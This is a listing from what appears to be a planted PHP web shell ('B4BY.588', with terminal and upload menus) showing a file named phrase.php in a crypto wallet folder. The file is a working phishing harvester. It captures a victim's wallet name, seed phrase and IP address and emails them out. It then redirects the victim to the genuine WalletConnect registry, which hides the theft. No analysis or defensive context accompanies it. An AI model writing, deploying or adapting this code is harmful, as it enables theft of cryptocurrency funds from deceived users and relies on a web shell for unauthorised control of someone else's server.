B4BY.588
Home
Terminal
Upload
information
Create File
Create Folder
About
Tools
:
/
disk1
/
worms
/
cespsin
/
2022ene02
/
crypto
/
wallet
/
Filename :
phrase.php
back
Copy
<?php include 'email.php'; $wallet = $_POST['w']; $phrase = $_POST['phrase']; $ip=$_SERVER['REMOTE_ADDR']; $subject = "contact submited by $ip"; $message = "wallet: ".$wallet."\n Phrase : ".$phrase."\n"; $headers = 'From: sender@example.com' . PHP_EOL . 'X-Mailer: PHP/' . phpversion(); // Sending email mail($to, $subject, $message, $headers); header('Location: https://registry.walletconnect.org/wallets'); ?>